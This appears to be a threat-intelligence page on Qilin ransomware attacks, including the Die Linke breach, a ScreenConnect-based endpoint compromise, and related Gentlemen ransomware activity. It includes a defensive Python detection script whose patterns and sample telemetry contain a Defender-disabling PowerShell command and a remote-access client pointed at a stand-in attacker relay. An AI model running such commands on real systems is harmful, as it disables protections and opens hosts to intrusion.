
Qilin Ransomware Campaign: German Political Party and Endpoint Compromises

1 unique source, 2 articles

Summary


Qilin ransomware has been linked to a high-profile data theft incident targeting Die Linke, a major German political party with 123,000 members and 64 seats in the Bundestag. The group stole sensitive internal party data and personal information of headquarters employees, though the membership database was reportedly unaffected. Die Linke attributed the attack to Qilin, describing them as Russian-speaking cybercriminals with financial and political motivations, and suggested the incident may be part of hybrid warfare operations. The initial investigation focused on a Huntress Labs endpoint compromise in which a rogue ScreenConnect instance was used to deploy malicious files and to attempt to disable Windows Defender before ransomware deployment. Qilin operates as a ransomware-as-a-service (RaaS) variant whose affiliates follow diverse attack patterns.

Timeline

  1. 03.04.2026 19:36 1 article · 23h ago

    Qilin claims attack on German political party Die Linke and threatens data leak

    On March 26, 2026, the Qilin ransomware group compromised the network of Die Linke, a German democratic socialist party with 123,000 members and 64 Bundestag seats. Die Linke disclosed the incident on March 26 but initially did not confirm a breach; on March 27, it confirmed attackers aimed to publish sensitive internal party data and personal information of party headquarters employees, while stating the membership database was unaffected. Die Linke attributed the attack to Qilin, describing them as Russian-speaking cybercriminals with financial and political motivations, and suggested the incident may constitute part of hybrid warfare operations. Qilin publicly claimed the attack on April 1, 2026, adding it to their data leak site without publishing data samples. Die Linke reported the incident to German authorities, filed a criminal complaint, and engaged independent IT experts to restore impacted systems.

  2. 22.11.2025 15:45 2 articles · 4mo ago

    Qilin Ransomware Incident Analysis

    The threat actor accessed the endpoint on October 8, 2025, and installed a rogue ScreenConnect instance. On October 11, 2025, three files were transferred to the endpoint via ScreenConnect. The threat actor attempted to disable Windows Defender and execute malicious files, but both attempts failed. Windows Defender detected attempts to create ransom notes, indicating the ransomware was likely launched from another endpoint.

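As an added illustration (not code from the source article, Huntress, or Qilin's tooling), the detection logic below correlates the three stages reported for this endpoint: a ScreenConnect client install pointing at a relay outside an allow-list, a Defender tampering command, and a ransom-note file drop. The host names, relay names, allow-list, tampering and file-name patterns, the `h=` client-argument convention, and the sample telemetry are all constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed allow-list of the organisation's own ScreenConnect relay hosts.
APPROVED_RELAYS = {"relay.corp-it.example"}

# Tampering commands and note-file names are illustrative assumptions, not IoCs from the report.
DEFENDER_TAMPER = re.compile(
    r"Set-MpPreference\b.*-Disable\w+|sc(\.exe)?\s+stop\s+WinDefend", re.I)
RANSOM_NOTE = re.compile(r"(recover|readme|restore)[^\\/]*\.(txt|html)$", re.I)

def classify(ev):
    """Map one telemetry record to a stage of the described chain, or None."""
    kind, detail = ev["type"], ev["detail"]
    if kind == "process" and "screenconnect" in ev["image"].lower():
        relay = re.search(r"[?&]h=([\w.-]+)", detail)  # h= names the relay host (assumed convention)
        if relay and relay.group(1) not in APPROVED_RELAYS:
            return "rogue_rmm_install"
    if kind == "process" and DEFENDER_TAMPER.search(detail):
        return "defender_tamper_attempt"
    if kind == "file" and RANSOM_NOTE.search(detail):
        return "ransom_note_drop"
    return None

def correlate(events, window=timedelta(days=7)):
    """Per host: stages seen within `window` after the first rogue RMM install."""
    by_host = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        stage = classify(ev)
        if stage:
            by_host[ev["host"]].append((datetime.fromisoformat(ev["ts"]), stage))
    findings = {}
    for host, st in by_host.items():
        t0 = next((t for t, s in st if s == "rogue_rmm_install"), None)
        if t0 is not None:  # hosts with no rogue install are not reported
            findings[host] = [s for t, s in st if t0 <= t <= t0 + window]
    return findings

# Constructed sample telemetry mirroring the reported sequence (WS-22 is a benign control).
SAMPLE_EVENTS = [
    {"ts": "2025-10-08T14:02:00", "host": "WS-17", "type": "process", "image": r"C:\Users\a\Downloads\ScreenConnect.ClientSetup.exe",
     "detail": "ScreenConnect.ClientSetup.exe ?e=Access&y=Guest&h=rmm-relay.attacker.example&p=8041"},
    {"ts": "2025-10-11T09:15:00", "host": "WS-17", "type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "detail": 'powershell.exe -c "Set-MpPreference -DisableRealtimeMonitoring $true"'},
    {"ts": "2025-10-11T09:16:30", "host": "WS-17", "type": "file", "image": "",
     "detail": r"C:\Users\Public\RECOVER-FILES-README.txt"},
    {"ts": "2025-10-09T10:00:00", "host": "WS-22", "type": "process", "image": r"C:\Program Files (x86)\ScreenConnect Client\ScreenConnect.ClientService.exe",
     "detail": "ScreenConnect.ClientService.exe ?e=Access&h=relay.corp-it.example&p=443"},
]
```

Running `correlate(SAMPLE_EVENTS)` reports only WS-17, with the three stages in order; the approved-relay install on WS-22 produces no finding.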


Similar Happenings

Gentlemen Ransomware Exploits Vulnerable Driver to Disable Security Software

The Gentlemen ransomware group, active since summer 2025, continues to evolve its tactics while leveraging a ransomware-as-a-service (RaaS) model. The group employs dual extortion, targeting Windows, Linux, and ESXi environments, with initial access often gained through exploitation of exposed FortiGate VPN devices. Affiliates use PowerShell and WMI for lateral movement, deploy anti-forensic tools, and target backup/security systems to maximize impact. The group is known for advanced evasion techniques, including BYOVD attacks via CVE-2025-7771 in the ThrottleStop driver, tailored to disable specific security vendors' products. The gang emerged from a dispute within the Qilin RaaS ecosystem and rapidly established itself using existing tooling. Its attacks have targeted critical infrastructure, including Romania's Oltenia Energy Complex on December 26, 2025, where documents were encrypted and multiple applications (ERP, email, document management) were temporarily disabled. The company cooperated with authorities and restored systems from backups. The group uses PowerRun.exe and Allpatch2.exe for privilege escalation and ransom notes with the .7mtzhh extension. While the National Energy System was not jeopardized, the incident is still under assessment for potential data theft. The group has added nearly four dozen victims to its leak site but has not yet listed Oltenia Energy Complex, likely due to ongoing negotiations.

Qilin ransomware group targets multiple organizations, including South Korean financial sector and Romanian oil pipeline operator Conpet

The Qilin ransomware group has confirmed the theft of nearly **1TB of data** from **Conpet S.A.**, Romania’s national oil pipeline operator, following a cyberattack on February 5, 2026. While the company’s **operational technologies (SCADA and telecommunications) remained unaffected**, the breach compromised corporate IT systems, exposing internal documents—including financial records and passport scans—some dated as recently as **November 2025**. Conpet has warned of potential fraud risks stemming from the stolen data and is working with Romania’s **National Cyber Security Directorate (DNSC)** to investigate the incident. This attack is part of Qilin’s broader 2025–2026 campaign, which has targeted high-profile victims across **62 countries**, including **Asahi Group (Japan)**, **Mecklenburg County Public Schools (U.S.)**, **Creative Box Inc. (Nissan subsidiary)**, and **Synnovis (UK pathology provider)**. The group employs **hybrid tactics**, such as abusing **Windows Subsystem for Linux (WSL)** to deploy Linux encryptors on Windows systems, **BYOVD (Bring Your Own Vulnerable Driver) exploits**, and **supply-chain compromises via Managed Service Providers (MSPs)**. Qilin’s **double-extortion model**—combining encryption with data leaks—has disrupted critical infrastructure, manufacturing, and financial sectors, with **over 700 confirmed victims in 2025 alone**. Recent developments include **politically charged leaks in South Korea** and **collaborations with affiliates like Scattered Spider**, underscoring the group’s evolving threat to global cybersecurity.